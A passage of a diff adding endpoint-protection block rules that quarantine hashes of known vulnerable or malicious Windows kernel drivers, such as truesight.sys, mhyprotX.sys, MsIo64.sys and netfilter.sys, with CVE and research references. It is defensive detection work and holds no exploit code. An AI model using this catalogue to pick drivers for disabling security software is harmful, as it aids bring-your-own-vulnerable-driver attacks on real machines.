+ "last_update": "2026-03-23T11:45:31.487523Z",
+ "creation_date": "2026-03-23T11:45:31.487525Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.487530Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "eaab0a8078b14e108dea51525b4b91acc28526337f06e9dd272c22242ddfe74b",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "8059b119-1dd6-578f-a40b-dfa198dde249",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.618566Z",
+ "creation_date": "2026-03-23T11:45:29.618568Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.618576Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "51dbf446deb54beb8aef1de11e0f868ac062a9db0c31d0e16eff99203aec86a9",
+ "comment": "NVIDIA vulnerable flash tool (aka nvflash.sys nd nvflsh64.sys) [CVE-2019-5688] [https://learn.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-driver-block-rules] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "8063326e-1b72-5c8a-b5cf-bd1930fe5280",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:32.143297Z",
+ "creation_date": "2026-03-23T11:45:32.143299Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:32.143305Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "ecd6e879e5521ca4053a59ef6682a95d97f6d9ba75f313b87bd133afe5267852",
+ "comment": "Vulnerable Kernel Driver (aka iQVW64.SYS) [https://www.loldrivers.io/drivers/4dd3289c-522c-4fce-b48e-5370efc90fa1/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "8065ab1e-139d-5cd0-b620-ac1c59aab364",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.496008Z",
+ "creation_date": "2026-03-23T11:45:31.496011Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.496020Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "07e98ca630e107adec07257ad17740d5da20a66513edf9174560fdf8c8bd6102",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "806f3e88-faf8-5503-82a8-2a6f2f3bd0f3",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.825164Z",
+ "creation_date": "2026-03-23T11:45:31.825167Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.825176Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "eb9577d0beee89bf57531a916a88085fb21a1ca8f217cbcdd2d9eb10395ec4c9",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "807157a0-211c-5ac3-b3d0-fc4571c3fdb5",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.157170Z",
+ "creation_date": "2026-03-23T11:45:31.157172Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.157178Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "a0f964dcc6e887a09959da6a0056b7ba4fdfa5f06869e3f9781f1836764afcf4",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "807852ac-62f7-5ffb-9e7c-a0e26320862e",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.475072Z",
+ "creation_date": "2026-03-23T11:45:30.475075Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.475084Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "ab6c6a6a4d7ae58cbbc63283699aaf59cf6ecddf56eba0933178732f2664abcd",
+ "comment": "Vulnerable Kernel Driver (aka cpuz.sys) [https://www.loldrivers.io/drivers/0f59ce3b-20ac-41ba-8010-2abc74827eb8/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "80818bdb-dfd8-5f2c-a088-af2aa8e3fce3",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.829893Z",
+ "creation_date": "2026-03-23T11:45:31.829895Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.829900Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "0ef42bd4b8f14f025fb220ed9a45aab6cd3fd8cc282042bd4d601ebfe7865fe7",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "8087457e-1df1-58ee-a611-09641e2f9e54",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.476020Z",
+ "creation_date": "2026-03-23T11:45:31.476024Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.476034Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "2f18cd5a57c83f7254c0e376fc713a387ba5b800a272c2013870bd5d4e483fdd",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "80994992-ad77-5142-b9e2-71858df38492",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.160738Z",
+ "creation_date": "2026-03-23T11:45:31.160740Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.160745Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "43e5c2e6aa753481f5a98f25d2369a8dde994a33f7780884c4669bf6b0327ffd",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "809b8951-1dfe-567f-b531-1dbe279faa14",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.614178Z",
+ "creation_date": "2026-03-23T11:45:29.614180Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.614185Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "ae42afa9be9aa6f6a5ae09fa9c05cd2dfb7861dc72d4fd8e0130e5843756c471",
+ "comment": "MICSYS Technology driver (aka MsIo64.sys) [CVE-2019-18845] [https://github.com/kkent030315/MsIoExploit] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "80a8b2a7-9d7f-5650-a3f3-4c7fb2974b75",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.611864Z",
+ "creation_date": "2026-03-23T11:45:29.611866Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.611882Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "26d69e677d30bb53c7ac7f3fce76291fe2c44720ef17ee386f95f08ec5175288",
+ "comment": "Genshin Impact vulnerable driver (aka mhyprotX.sys) [https://www.trendmicro.com/en_us/research/22/h/ransomware-actor-abuses-genshin-impact-anti-cheat-driver-to-kill-antivirus.html] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "80a9b8ca-1603-5cff-826b-3ff270d37cda",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.141921Z",
+ "creation_date": "2026-03-23T11:45:31.141923Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.141928Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "0e8dd1f4de4e4cc11d3f6ca90d2f247df53aceec3e785a6245b35c98bc509d3b",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "80af64e7-9c8a-5749-a901-e9528ce65a37",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.812544Z",
+ "creation_date": "2026-03-23T11:45:31.812546Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.812552Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "2b858eda9816986ec170cb5fa8f2bbf807c77a46430264b68a379e568a788bc6",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "80b19be8-d030-5950-8d92-4ecfd72a5738",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.978475Z",
+ "creation_date": "2026-03-23T11:45:29.978477Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.978483Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "18dfe852fade6625862cc963922c1f2389a296af96df11eb7b62bbeddd61e18a",
+ "comment": "Vulnerable Kernel Driver (aka sandra.sys) [https://www.loldrivers.io/drivers/a7628504-9e35-4e42-91f7-0c0a512549f4/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "80bb6ad6-e9ea-53ed-a5a3-11f2423884a4",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.151569Z",
+ "creation_date": "2026-03-23T11:45:31.151572Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.151582Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "4053661f7153f5305e9aa491c003b2025e2b8ed96a9cf83d539916fe52b8bf8b",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "80c0fccb-c742-5b2d-934c-2b2d8c450dc1",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.142362Z",
+ "creation_date": "2026-03-23T11:45:31.142364Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.142369Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "a12541f2b5689d8270552a397e45522eb2638a08235540db197872d264caf597",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "80cdbc9f-b575-5b57-bdd0-50b616204d09",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.157257Z",
+ "creation_date": "2026-03-23T11:45:31.157259Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.157265Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "acc7c9347635ea9b1e449696ba6ee06134781aa7a8a12d1b492c51afd3385bce",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "80d3836f-985c-5d5d-86c5-19870f8abf00",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.983999Z",
+ "creation_date": "2026-03-23T11:45:29.984001Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.984007Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "6de84caa2ca18673e01b91af58220c60aecd5cccf269725ec3c7f226b2167492",
+ "comment": "Vulnerable Kernel Driver (aka msrhook.sys) [https://www.loldrivers.io/drivers/1a1cf88a-96d0-46cd-a24d-1535e4a5f6e3/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "80db9ef8-8229-5987-a447-daf1e8421fcc",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.976336Z",
+ "creation_date": "2026-03-23T11:45:29.976338Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.976343Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "88076e98d45ed3adf0c5355411fe8ca793eb7cec1a1c61f5e1ec337eae267463",
+ "comment": "Malicious attestation-signed Drivers (aka NodeDriver.sys, 4.sys, Air_SYSTEM10.sys etc.) [https://www.mandiant.com/resources/blog/hunting-attestation-signed-malware] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "80dbe0fe-d855-5e9a-96f0-d4e9f4cd4fda",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.834928Z",
+ "creation_date": "2026-03-23T11:45:30.834931Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.834940Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "237f79d4c8784776469b41378698f855c26e20f363ddffbed5e55f978110a8f8",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "80f65a26-e347-547b-92a8-21b3e7c53ce0",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.967456Z",
+ "creation_date": "2026-03-23T11:45:29.967458Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.967464Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "bbc58fd69ce5fed6691dd8d2084e9b728add808ffd5ea8b42ac284b686f77d9a",
+ "comment": "Retliften malicious signed drivers (aka netfilter.sys) [https://msrc-blog.microsoft.com/2021/06/25/investigating-and-mitigating-malicious-drivers/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "80fb12ff-e6fa-5515-abb4-4859adcd5861",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.984906Z",
+ "creation_date": "2026-03-23T11:45:29.984908Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.984913Z",
+ "rule_level": null,
+ "rule_level_override": null,
